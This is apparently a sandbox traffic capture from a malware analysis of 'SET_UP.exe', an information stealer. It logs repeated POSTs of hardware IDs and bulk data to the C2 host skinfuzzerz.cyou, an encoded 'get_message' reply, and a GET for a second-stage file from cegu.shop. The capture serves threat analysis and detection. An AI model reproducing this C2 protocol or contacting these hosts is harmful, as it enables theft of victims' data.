                                                                                                                                                            Data Ascii: --R0WF7AGPFEContent-Disposition: form-data; name="hwid"8CB2E1475A80558D4F56F59586ABF308--R0WF7AGPFEContent-Disposition: form-data; name="pid"2--R0WF7AGPFEContent-Disposition: form-data; name="lid"hRjzG3--ELVIRA--R0WF7AGPFEContent
                                                                                                                                                            2025-01-07 13:48:26 UTC2785OUTData Raw: 97 c5 15 2e a7 07 cf 5c b7 ad 66 f0 cc 99 a8 33 f7 13 05 cf ec 85 7a 3b 85 8d 54 32 2f 1f e5 1b c1 33 7b 37 a5 bf 9f 8e 3a f1 6e 9a e0 79 69 60 c1 4c a6 f2 f7 de 4b 1f 36 af 1d f9 d7 e0 58 6d 5b 0b fd 9c 0a b5 9b 60 cc b0 d7 ab 1f 3b d0 52 0a 9f fd 54 22 95 3f 7a 94 ff 75 ab 9f a1 e3 6f 93 83 99 38 43 4e 2f 95 2f 6d 6e ac ae d3 03 1e ad ac 6f 7a a3 8a 81 36 d9 bf 1f 83 71 fd 1a ed c5 4d d3 3e 9b d8 ac 97 0c bd 15 36 2b 97 37 bb ef 2e 57 0f bc 3e 57 2a 0f 97 2f ad 6d 4a a7 02 2f 2b 7f 42 10 78 3e ba 45 a8 b5 6d 75 bf 83 75 53 b3 09 3b 9c 3e 27 56 d3 d4 ab d6 33 5e 4f 4d 1f 4e cd b2 89 b4 bc b1 b1 56 29 af ef 1e fa 70 79 ed 62 65 cf 7b d9 de 73 45 81 36 af a9 da 16 51 bc 21 8f 77 45 11 8f 43 d4 61 11 d5 14 88 8d cc 54 77 94 6d 93 be 93 15 d7 52 9c ab a6 b6
                                                                                                                                                            Data Ascii: .\f3z;T2/3{7:nyi`LK6Xm[`;RT"?zuo8CN//mnoz6qM>6+7.W>W*/mJ/+Bx>EmuuS;>'V3^OMNV)pybe{sE6Q!wECaTwmR
                                                                                                                                                            2025-01-07 13:48:28 UTC1123INHTTP/1.1 200 OK
                                                                                                                                                            Date: Tue, 07 Jan 2025 13:48:27 GMT
                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                            Connection: close
                                                                                                                                                            Set-Cookie: PHPSESSID=3iqhfe90qkd9npckkn0l159c6m; expires=Sat, 03 May 2025 07:35:05 GMT; Max-Age=9999999; path=/
                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                            Pragma: no-cache
                                                                                                                                                            X-Frame-Options: DENY
                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                            vary: accept-encoding
                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rI2vk1QjMhGMzF7ox9WwStC9P5XQqIcWdaqHOlNNIbrlPB5KNn%2BCqq8virjZNBO2gprPkmWUvd%2FSDzkcs0n6CtHYTZ1W8hID2zgcTtDPE40EsQexhpGbIh2A1JKgPeBSvoqh"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                            Server: cloudflare
                                                                                                                                                            CF-RAY: 8fe467c94e5a42fd-EWR
                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1600&min_rtt=1582&rtt_var=629&sent=12&recv=23&lost=0&retrans=0&sent_bytes=2837&recv_bytes=19070&delivery_rate=1690793&cwnd=248&unsent_bytes=0&cid=b196c739781ee7aa&ts=991&x=0"
                                                                                                                                                            2025-01-07 13:48:28 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                            Data Ascii: fok 8.46.123.189
                                                                                                                                                            2025-01-07 13:48:28 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                            Data Ascii: 0


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                            3192.168.2.449753188.114.97.34437268C:\Users\user\Desktop\SET_UP.exe
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            2025-01-07 13:48:28 UTC280OUTPOST /api HTTP/1.1
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            Content-Type: multipart/form-data; boundary=J3TIF90L1DDF8I5WY
                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                            Content-Length: 8779
                                                                                                                                                            Host: skinfuzzerz.cyou
                                                                                                                                                            2025-01-07 13:48:28 UTC8779OUTData Raw: 2d 2d 4a 33 54 49 46 39 30 4c 31 44 44 46 38 49 35 57 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 43 42 32 45 31 34 37 35 41 38 30 35 35 38 44 34 46 35 36 46 35 39 35 38 36 41 42 46 33 30 38 0d 0a 2d 2d 4a 33 54 49 46 39 30 4c 31 44 44 46 38 49 35 57 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 4a 33 54 49 46 39 30 4c 31 44 44 46 38 49 35 57 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 45 4c 56 49 52 41 0d 0a
                                                                                                                                                            Data Ascii: --J3TIF90L1DDF8I5WYContent-Disposition: form-data; name="hwid"8CB2E1475A80558D4F56F59586ABF308--J3TIF90L1DDF8I5WYContent-Disposition: form-data; name="pid"2--J3TIF90L1DDF8I5WYContent-Disposition: form-data; name="lid"hRjzG3--ELVIRA
                                                                                                                                                            2025-01-07 13:48:29 UTC1124INHTTP/1.1 200 OK
                                                                                                                                                            Date: Tue, 07 Jan 2025 13:48:29 GMT
                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                            Connection: close
                                                                                                                                                            Set-Cookie: PHPSESSID=4cg6m4l6g2c15hd7lv48lqu1bm; expires=Sat, 03 May 2025 07:35:08 GMT; Max-Age=9999999; path=/
                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                            Pragma: no-cache
                                                                                                                                                            X-Frame-Options: DENY
                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                            vary: accept-encoding
                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ugbouBhYZYehpGDdfGtpWuLNAdR29MTv0%2F6ug5vjxU1sn3e0Iku7Tu7egDdlmz4FO8DjStvso%2F2Z1l7wwYuYJ0QSsjIyo9ot%2F%2BeUsVnOm1jSAIjAepeyaLAgeDpRC3JW3Y5F"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                            Server: cloudflare
                                                                                                                                                            CF-RAY: 8fe467d8dd150f67-EWR
                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1567&min_rtt=1557&rtt_var=604&sent=6&recv=13&lost=0&retrans=0&sent_bytes=2837&recv_bytes=9717&delivery_rate=1781574&cwnd=47&unsent_bytes=0&cid=6f3bb75b151d85d8&ts=539&x=0"
                                                                                                                                                            2025-01-07 13:48:29 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                            Data Ascii: fok 8.46.123.189
                                                                                                                                                            2025-01-07 13:48:29 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                            Data Ascii: 0


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                            4192.168.2.449754188.114.97.34437268C:\Users\user\Desktop\SET_UP.exe
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            2025-01-07 13:48:30 UTC281OUTPOST /api HTTP/1.1
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            Content-Type: multipart/form-data; boundary=1BP8P7DHDMKP0OSWR
                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                            Content-Length: 20432
                                                                                                                                                            Host: skinfuzzerz.cyou
                                                                                                                                                            2025-01-07 13:48:30 UTC15331OUTData Raw: 2d 2d 31 42 50 38 50 37 44 48 44 4d 4b 50 30 4f 53 57 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 43 42 32 45 31 34 37 35 41 38 30 35 35 38 44 34 46 35 36 46 35 39 35 38 36 41 42 46 33 30 38 0d 0a 2d 2d 31 42 50 38 50 37 44 48 44 4d 4b 50 30 4f 53 57 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 31 42 50 38 50 37 44 48 44 4d 4b 50 30 4f 53 57 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 45 4c 56 49 52 41 0d 0a
                                                                                                                                                            Data Ascii: --1BP8P7DHDMKP0OSWRContent-Disposition: form-data; name="hwid"8CB2E1475A80558D4F56F59586ABF308--1BP8P7DHDMKP0OSWRContent-Disposition: form-data; name="pid"3--1BP8P7DHDMKP0OSWRContent-Disposition: form-data; name="lid"hRjzG3--ELVIRA
                                                                                                                                                            2025-01-07 13:48:30 UTC5101OUTData Raw: 00 00 00 60 93 1b 88 82 85 4d 3f 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60 61 d3 4f 03 00 00 00 00 00
                                                                                                                                                            Data Ascii: `M?lrQMn 64F6(X&7~`aO
                                                                                                                                                            2025-01-07 13:48:31 UTC1123INHTTP/1.1 200 OK
                                                                                                                                                            Date: Tue, 07 Jan 2025 13:48:30 GMT
                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                            Connection: close
                                                                                                                                                            Set-Cookie: PHPSESSID=r9m18o0m019e2ppedpgpub50od; expires=Sat, 03 May 2025 07:35:09 GMT; Max-Age=9999999; path=/
                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                            Pragma: no-cache
                                                                                                                                                            X-Frame-Options: DENY
                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                            vary: accept-encoding
                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yul9YOj4IztRIw7F86c%2FN0jT%2B44hJVaarGmEfsqPSvmKO9wZFMtEKBX4Kpf85ArmN6v8PBjRIdgj5iiwC1EfN4SLmTldkfsB5W2huh23gaeNrtQ7pIFvxazuOupVvQVXpbTi"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                            Server: cloudflare
                                                                                                                                                            CF-RAY: 8fe467e06ce34299-EWR
                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1712&min_rtt=1705&rtt_var=654&sent=10&recv=25&lost=0&retrans=0&sent_bytes=2838&recv_bytes=21393&delivery_rate=1653454&cwnd=251&unsent_bytes=0&cid=71a1cbfa162a9647&ts=926&x=0"
                                                                                                                                                            2025-01-07 13:48:31 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                            Data Ascii: fok 8.46.123.189
                                                                                                                                                            2025-01-07 13:48:31 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                            Data Ascii: 0


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                            5192.168.2.449755188.114.97.34437268C:\Users\user\Desktop\SET_UP.exe
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            2025-01-07 13:48:33 UTC271OUTPOST /api HTTP/1.1
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            Content-Type: multipart/form-data; boundary=9JWW0VJD
                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                            Content-Length: 1212
                                                                                                                                                            Host: skinfuzzerz.cyou
                                                                                                                                                            2025-01-07 13:48:33 UTC1212OUTData Raw: 2d 2d 39 4a 57 57 30 56 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 43 42 32 45 31 34 37 35 41 38 30 35 35 38 44 34 46 35 36 46 35 39 35 38 36 41 42 46 33 30 38 0d 0a 2d 2d 39 4a 57 57 30 56 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 39 4a 57 57 30 56 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 45 4c 56 49 52 41 0d 0a 2d 2d 39 4a 57 57 30 56 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69
                                                                                                                                                            Data Ascii: --9JWW0VJDContent-Disposition: form-data; name="hwid"8CB2E1475A80558D4F56F59586ABF308--9JWW0VJDContent-Disposition: form-data; name="pid"1--9JWW0VJDContent-Disposition: form-data; name="lid"hRjzG3--ELVIRA--9JWW0VJDContent-Disposi
                                                                                                                                                            2025-01-07 13:48:33 UTC1118INHTTP/1.1 200 OK
                                                                                                                                                            Date: Tue, 07 Jan 2025 13:48:33 GMT
                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                            Connection: close
                                                                                                                                                            Set-Cookie: PHPSESSID=pe2sp0me2vq8dickd5v8r3tdgf; expires=Sat, 03 May 2025 07:35:12 GMT; Max-Age=9999999; path=/
                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                            Pragma: no-cache
                                                                                                                                                            X-Frame-Options: DENY
                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                            vary: accept-encoding
                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nGVdwuKdK9XH5vhkYVIwSxmbkZPZ30LpO3MdbQTcODsIJmSKxpvNvcHtS2xPVPJye79JlTWOkI4vP5Loe73KSqYzY8eUrtWu977D%2F0K12gEyaCutK9FgYGXjm2fdjrUuB4YU"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                            Server: cloudflare
                                                                                                                                                            CF-RAY: 8fe467f2daa57d1e-EWR
                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1991&min_rtt=1987&rtt_var=754&sent=5&recv=9&lost=0&retrans=0&sent_bytes=2837&recv_bytes=2119&delivery_rate=1444114&cwnd=192&unsent_bytes=0&cid=297e0307b78ddeb6&ts=440&x=0"
                                                                                                                                                            2025-01-07 13:48:33 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                            Data Ascii: fok 8.46.123.189
                                                                                                                                                            2025-01-07 13:48:33 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                            Data Ascii: 0


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                            6192.168.2.449756188.114.97.34437268C:\Users\user\Desktop\SET_UP.exe
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            2025-01-07 13:48:34 UTC281OUTPOST /api HTTP/1.1
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            Content-Type: multipart/form-data; boundary=VW51LKHI38YBQKGO44
                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                            Content-Length: 1104
                                                                                                                                                            Host: skinfuzzerz.cyou
                                                                                                                                                            2025-01-07 13:48:34 UTC1104OUTData Raw: 2d 2d 56 57 35 31 4c 4b 48 49 33 38 59 42 51 4b 47 4f 34 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 43 42 32 45 31 34 37 35 41 38 30 35 35 38 44 34 46 35 36 46 35 39 35 38 36 41 42 46 33 30 38 0d 0a 2d 2d 56 57 35 31 4c 4b 48 49 33 38 59 42 51 4b 47 4f 34 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 56 57 35 31 4c 4b 48 49 33 38 59 42 51 4b 47 4f 34 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 45 4c 56 49 52
                                                                                                                                                            Data Ascii: --VW51LKHI38YBQKGO44Content-Disposition: form-data; name="hwid"8CB2E1475A80558D4F56F59586ABF308--VW51LKHI38YBQKGO44Content-Disposition: form-data; name="pid"1--VW51LKHI38YBQKGO44Content-Disposition: form-data; name="lid"hRjzG3--ELVIR
                                                                                                                                                            2025-01-07 13:48:34 UTC1126INHTTP/1.1 200 OK
                                                                                                                                                            Date: Tue, 07 Jan 2025 13:48:34 GMT
                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                            Connection: close
                                                                                                                                                            Set-Cookie: PHPSESSID=qbqbf0o09g9h0t433bd7l7qhfe; expires=Sat, 03 May 2025 07:35:13 GMT; Max-Age=9999999; path=/
                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                            Pragma: no-cache
                                                                                                                                                            X-Frame-Options: DENY
                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                            vary: accept-encoding
                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bPLSt7m2lvO63AxA1FIpA4zGaNVXgM%2FmsY2HET4%2B8atmRj6UuUirRXl722WukJ5sffNgvL26D1bIhK9g6EYIWbna%2Bu5D%2BVBEz8ZPT4kYdLImBw%2FFkfAyWSqcuy4rEAVQFYy1"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                            Server: cloudflare
                                                                                                                                                            CF-RAY: 8fe467f928767d05-EWR
                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=2026&min_rtt=2019&rtt_var=772&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2836&recv_bytes=2021&delivery_rate=1403846&cwnd=195&unsent_bytes=0&cid=81f0b488f586bb9d&ts=519&x=0"
                                                                                                                                                            2025-01-07 13:48:34 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                            Data Ascii: fok 8.46.123.189
                                                                                                                                                            2025-01-07 13:48:34 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                            Data Ascii: 0


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                            7192.168.2.449757188.114.97.34437268C:\Users\user\Desktop\SET_UP.exe
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            2025-01-07 13:48:35 UTC265OUTPOST /api HTTP/1.1
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                            Content-Length: 115
                                                                                                                                                            Host: skinfuzzerz.cyou
                                                                                                                                                            2025-01-07 13:48:35 UTC115OUTData Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 68 52 6a 7a 47 33 2d 2d 45 4c 56 49 52 41 26 6a 3d 65 66 64 65 62 64 65 30 35 37 61 31 64 66 33 66 37 63 31 35 62 37 66 34 64 61 39 30 37 63 32 64 26 68 77 69 64 3d 38 43 42 32 45 31 34 37 35 41 38 30 35 35 38 44 34 46 35 36 46 35 39 35 38 36 41 42 46 33 30 38
                                                                                                                                                            Data Ascii: act=get_message&ver=4.0&lid=hRjzG3--ELVIRA&j=efdebde057a1df3f7c15b7f4da907c2d&hwid=8CB2E1475A80558D4F56F59586ABF308
                                                                                                                                                            2025-01-07 13:48:35 UTC1126INHTTP/1.1 200 OK
                                                                                                                                                            Date: Tue, 07 Jan 2025 13:48:35 GMT
                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                            Connection: close
                                                                                                                                                            Set-Cookie: PHPSESSID=irca5sf98ucqtmmicu60ihknrs; expires=Sat, 03 May 2025 07:35:14 GMT; Max-Age=9999999; path=/
                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                            Pragma: no-cache
                                                                                                                                                            X-Frame-Options: DENY
                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                            vary: accept-encoding
                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FPo%2BhkD1ui4KxC7cn7SqHE5CKTnel%2F%2BgQPCxuXXLMBqOHZ0pSUcGv6JM8omzRu1R3bBjj67Qz9wcV4kQqqwWpVf2U1yFVZk3tKRxGLgNDBfstwba0rrcptW9MIrIu0J%2B38oG"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                            Server: cloudflare
                                                                                                                                                            CF-RAY: 8fe467ff7a2a1795-EWR
                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1514&min_rtt=1514&rtt_var=569&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2837&recv_bytes=1016&delivery_rate=1922317&cwnd=172&unsent_bytes=0&cid=699cf2a3d2488337&ts=495&x=0"
                                                                                                                                                            2025-01-07 13:48:35 UTC218INData Raw: 64 34 0d 0a 58 73 2f 74 68 70 72 2f 72 49 55 71 39 76 4b 50 34 70 32 49 6a 63 31 6e 4e 69 53 79 56 53 47 53 37 62 35 65 6e 46 49 32 4b 34 49 46 74 4d 2f 7a 75 4d 57 4f 37 56 36 43 67 76 7a 59 77 61 66 52 34 67 52 54 51 38 64 37 55 76 71 43 7a 67 4b 7a 61 67 4d 63 74 6d 7a 35 33 37 4b 75 79 66 43 71 57 70 37 63 2b 35 72 70 71 71 48 76 41 55 49 47 69 47 63 4e 73 49 69 63 5a 4b 30 76 47 6c 43 67 4b 2b 33 58 70 50 4b 4c 32 50 56 5a 7a 4b 36 67 76 72 4c 6a 34 61 51 58 51 46 48 66 50 46 4c 6e 68 4a 41 74 39 44 31 47 64 36 30 33 6f 5a 6e 5a 2b 5a 50 63 32 6c 6d 65 6b 36 47 57 35 66 79 76 34 55 56 51 55 4a 42 76 45 62 37 50 32 33 79 6d 59 6b 74 32 0d 0a
                                                                                                                                                            Data Ascii: d4Xs/thpr/rIUq9vKP4p2Ijc1nNiSyVSGS7b5enFI2K4IFtM/zuMWO7V6CgvzYwafR4gRTQ8d7UvqCzgKzagMctmz537KuyfCqWp7c+5rpqqHvAUIGiGcNsIicZK0vGlCgK+3XpPKL2PVZzK6gvrLj4aQXQFHfPFLnhJAt9D1Gd603oZnZ+ZPc2lmek6GW5fyv4UVQUJBvEb7P23ymYkt2
                                                                                                                                                            2025-01-07 13:48:35 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                            Data Ascii: 0


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                            8192.168.2.449758185.161.251.214437268C:\Users\user\Desktop\SET_UP.exe
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            2025-01-07 13:48:36 UTC201OUTGET /8574262446/ph.txt HTTP/1.1
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                            Host: cegu.shop
                                                                                                                                                            2025-01-07 13:48:36 UTC249INHTTP/1.1 200 OK
                                                                                                                                                            Server: nginx/1.26.2
                                                                                                                                                            Date: Tue, 07 Jan 2025 13:48:36 GMT
                                                                                                                                                            Content-Type: text/plain; charset=utf-8
                                                                                                                                                            Content-Length: 329
                                                                                                                                                            Last-Modified: Thu, 26 Dec 2024 00:07:06 GMT
                                                                                                                                                            Connection: close
                                                                                                                                                            ETag: "676c9e2a-149"
                                                                                                                                                            Accept-Ranges: bytes
